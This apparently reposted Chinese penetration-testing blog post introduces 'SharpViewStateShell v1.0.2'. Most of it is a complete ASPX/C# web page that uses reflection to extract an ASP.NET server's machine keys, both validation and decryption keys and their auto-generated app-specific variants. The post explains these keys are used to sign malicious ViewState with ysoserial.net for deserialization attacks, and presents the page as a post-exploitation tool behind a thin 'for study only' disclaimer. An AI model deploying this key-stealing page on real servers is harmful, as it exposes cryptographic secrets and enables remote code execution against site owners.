SharpViewStateShell v1.0.2

渗透技巧 2个月前 admin
146 0 0


只要知道 ASP.NET 中关于 ViewState 的 ValidationKeyValidationAlg ,那么我们根据它反序列化函数中的判断,只需要从 ysoserial.net 扣取对应的签名过程即可。

获取  ValidationKey 和 ValidationAlg 的脚本为:

<%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script runat="server" language="c#" CODEPAGE="65001">
public void GetAutoMachineKeys() { var netVersion = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\", "Version", Microsoft.Win32.RegistryValueKind.ExpandString); if(netVersion!=null) Response.Write("<b>NetVersion: </b>" + netVersion); Response.Write("<br/><hr/>"); // ========================================================================== var systemWebAsm = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"); var machineKeySectionType = systemWebAsm.GetType("System.Web.Configuration.MachineKeySection"); var getApplicationConfigMethod = machineKeySectionType.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic); var config = (System.Web.Configuration.MachineKeySection)getApplicationConfigMethod.Invoke(null, new object[0]); Response.Write("<b>ValidationKey:</b> "+config.ValidationKey); Response.Write("<br/>"); Response.Write("<b>ValidationAlg:</b> "+ config.Validation); Response.Write("<br/>"); Response.Write("<b>DecryptionKey:</b> "+ config.DecryptionKey); Response.Write("<br/>"); Response.Write("<b>DecryptionAlg:</b> "+ config.Decryption); Response.Write("<br/>"); Response.Write("<b>CompatibilityMode:</b> "+config.CompatibilityMode); Response.Write("<br/><hr/>"); // ========================================================================== var typeMachineKeyMasterKeyProvider = systemWebAsm.GetType("System.Web.Security.Cryptography.MachineKeyMasterKeyProvider"); var instance = typeMachineKeyMasterKeyProvider.Assembly.CreateInstance( typeMachineKeyMasterKeyProvider.FullName, false, System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic, null, new object[] { config, null, null, null, null }, null, null); var validationKey = typeMachineKeyMasterKeyProvider.GetMethod("GetValidationKey").Invoke(instance, new object[0]); byte[] _validationKey = (byte[])validationKey.GetType().GetMethod("GetKeyMaterial").Invoke(validationKey, new object[0]); var encryptionKey = typeMachineKeyMasterKeyProvider.GetMethod("GetEncryptionKey").Invoke(instance, new object[0]); byte[] _decryptionKey = (byte[])validationKey.GetType().GetMethod("GetKeyMaterial").Invoke(encryptionKey, new object[0]); // ========================================================================== Response.Write("<br/><b>ASP.NET 4.0 and below:</b><br/>"); byte[] autogenKeys = (byte[])typeof(HttpRuntime).GetField("s_autogenKeys", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static).GetValue(null); int validationKeySize = 64; int decryptionKeySize = 24; byte[] validationKeyAuto = new byte[validationKeySize]; byte[] decryptionKeyAuto = new byte[decryptionKeySize]; System.Buffer.BlockCopy(autogenKeys, 0, validationKeyAuto, 0, validationKeySize); System.Buffer.BlockCopy(autogenKeys, validationKeySize, decryptionKeyAuto, 0, decryptionKeySize); string appName = HttpRuntime.AppDomainAppVirtualPath; string appId = HttpRuntime.AppDomainAppId; Response.Write("<br/>"); Response.Write("<b>appName:</b> "+appName); Response.Write("<br/>"); Response.Write("<b>appId:</b> "+appId); Response.Write("<br/>"); Response.Write("<b>initial validationKey (not useful for direct use):</b> "); Response.Write(BitConverter.ToString(validationKeyAuto).Replace("-", string.Empty)); Response.Write("<br/>"); Response.Write("<b>initial decryptionKey (not useful for direct use):</b> "); Response.Write(BitConverter.ToString(decryptionKeyAuto).Replace("-", string.Empty)); Response.Write("<br/>");
byte[] _validationKeyAutoAppSpecific = validationKeyAuto.ToArray(); int dwCode3 = StringComparer.InvariantCultureIgnoreCase.GetHashCode(appName); _validationKeyAutoAppSpecific[0] = (byte)(dwCode3 & 0xff); _validationKeyAutoAppSpecific[1] = (byte)((dwCode3 & 0xff00) >> 8); _validationKeyAutoAppSpecific[2] = (byte)((dwCode3 & 0xff0000) >> 16); _validationKeyAutoAppSpecific[3] = (byte)((dwCode3 & 0xff000000) >> 24); Response.Write("<b>App specific ValidationKey (when uses IsolateApps):</b> "); Response.Write(BitConverter.ToString(_validationKeyAutoAppSpecific).Replace("-", string.Empty)); Response.Write("<br/>");
byte[] _validationKeyAutoAppIdSpecific = validationKeyAuto.ToArray(); int dwCode4 = StringComparer.InvariantCultureIgnoreCase.GetHashCode(appId); _validationKeyAutoAppIdSpecific[4] = (byte)(dwCode4 & 0xff); _validationKeyAutoAppIdSpecific[5] = (byte)((dwCode4 & 0xff00) >> 8); _validationKeyAutoAppIdSpecific[6] = (byte)((dwCode4 & 0xff0000) >> 16); _validationKeyAutoAppIdSpecific[7] = (byte)((dwCode4 & 0xff000000) >> 24); Response.Write("<b>AppId Auto specific ValidationKey (when uses IsolateByAppId):</b> "); Response.Write(BitConverter.ToString(_validationKeyAutoAppIdSpecific).Replace("-", string.Empty)); Response.Write("<br/>");
byte[] _decryptionKeyAutoAutoAppSpecific = decryptionKeyAuto.ToArray(); _decryptionKeyAutoAutoAppSpecific[0] = (byte)(dwCode3 & 0xff); _decryptionKeyAutoAutoAppSpecific[1] = (byte)((dwCode3 & 0xff00) >> 8); _decryptionKeyAutoAutoAppSpecific[2] = (byte)((dwCode3 & 0xff0000) >> 16); _decryptionKeyAutoAutoAppSpecific[3] = (byte)((dwCode3 & 0xff000000) >> 24); Response.Write("<b>App specific DecryptionKey (when uses IsolateApps):</b> "); Response.Write(BitConverter.ToString(_decryptionKeyAutoAutoAppSpecific).Replace("-", string.Empty)); Response.Write("<br/>");
byte[] _decryptionKeyAutoAutoAppIdSpecific = decryptionKeyAuto.ToArray(); _decryptionKeyAutoAutoAppIdSpecific[4] = (byte)(dwCode4 & 0xff); _decryptionKeyAutoAutoAppIdSpecific[5] = (byte)((dwCode4 & 0xff00) >> 8); _decryptionKeyAutoAutoAppIdSpecific[6] = (byte)((dwCode4 & 0xff0000) >> 16); _decryptionKeyAutoAutoAppIdSpecific[7] = (byte)((dwCode4 & 0xff000000) >> 24); Response.Write("<b>AppId Auto specific DecryptionKey (when uses IsolateByAppId):</b> "); Response.Write(BitConverter.ToString(_decryptionKeyAutoAutoAppIdSpecific).Replace("-", string.Empty)); Response.Write("<br/><hr/>"); // ========================================================================== Response.Write("<br/><b>ASP.NET 4.5 and above:</b><br/>"); Response.Write("<br/>"); Response.Write("<b>validationAlg:</b> "+config.Validation); Response.Write("<br/>"); Response.Write("<b>validationKey:</b> "+BitConverter.ToString(_validationKey).Replace("-", string.Empty)); Response.Write("<br/>"); Response.Write("<b>decryptionAlg:</b> "+config.Decryption); Response.Write("<br/>"); Response.Write("<b>decryptionKey:</b> "+BitConverter.ToString(_decryptionKey).Replace("-", string.Empty)); Response.Write("<br/><hr/>"); }
public void Page_load() { Response.ContentEncoding = System.Text.Encoding.Default; Response.Write("<p style='color:#ff0000;text-align:center;'>获取 .NET 框架的机器密钥</p>"); Response.Write("<p>1. 本程序仅供实验学习 ASP.NET ViewState,请勿违法滥用!</p>"); Response.Write("<p>2. 适用场景:获取 .NET 框架权限后均适用!</p>"); Response.Write("<p>3. 公众号:RowTeam</p>"); Response.Write("<br/><hr/>"); GetAutoMachineKeys(); }</script>


全程只靠图。


SharpViewStateShell v1.0.2



效果如下所示:


SharpViewStateShell v1.0.2






原文始发于微信公众号(RowTeam):SharpViewStateShell v1.0.2

版权声明:admin 发表于 2022年12月14日 下午12:22。
转载请注明:SharpViewStateShell v1.0.2 | CTF导航

相关文章

暂无评论

暂无评论...